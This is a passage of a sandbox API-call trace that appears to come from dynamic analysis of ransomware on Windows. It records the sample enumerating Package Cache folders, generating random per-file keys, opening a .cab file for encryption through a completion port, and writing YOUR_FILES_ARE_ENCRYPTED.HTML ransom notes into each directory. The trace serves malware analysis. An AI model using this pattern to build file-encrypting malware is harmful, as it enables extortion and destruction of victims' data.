lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0158.014] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*" [0158.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.015] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.015] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.015] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 91 [0158.015] GetProcessHeap () returned 0x270000 [0158.015] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.015] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0158.015] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*" [0158.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.015] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.015] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.015] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 112 [0158.015] GetProcessHeap () returned 0x270000 [0158.016] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.018] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0158.018] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*" [0158.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.018] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.018] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.018] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0158.018] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.018] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.018] lstrlenW (lpString=".cab") returned 4 [0158.018] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.018] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.018] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0158.019] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=997054) returned 1 [0158.019] GetProcessHeap () returned 0x270000 [0158.019] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.023] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="66") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="31") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="6E") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="8D") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EE") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="6B") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="79") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="9E") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6F") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="37") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="3C") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="35") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C8") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="BB") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="6C") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="AE") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="92") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="1B") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="2F") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="17") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="33") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6A") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="57") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2F") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4F") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="2B") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2A") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="49") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="9C") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="2A") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E9") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6B") returned 2 [0158.025] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0158.025] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.025] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.025] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.025] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0158.025] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.025] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.025] lstrlenW (lpString=".msi") returned 4 [0158.025] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.026] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.027] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.027] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0158.027] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0158.060] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.062] CloseHandle (hObject=0x5a0) returned 1 [0158.063] GetProcessHeap () returned 0x270000 [0158.064] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.069] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.069] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.070] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0158.070] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.070] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.072] CloseHandle (hObject=0x598) returned 1 [0158.073] GetProcessHeap () returned 0x270000 [0158.074] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.074] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.074] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.074] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0158.075] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.075] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.077] CloseHandle (hObject=0x58c) returned 1 [0158.077] GetProcessHeap () returned 0x270000 [0158.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.078] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", cAlternateFileName="{2BC3B~1.285")) returned 1 [0158.078] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned 83 [0158.078] GetProcessHeap () returned 0x270000 [0158.078] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.078] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" [0158.078] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*" [0158.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.079] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.079] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.079] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned 92 [0158.079] GetProcessHeap () returned 0x270000 [0158.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.079] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" [0158.079] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*" [0158.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.080] FindNextFileW (in: 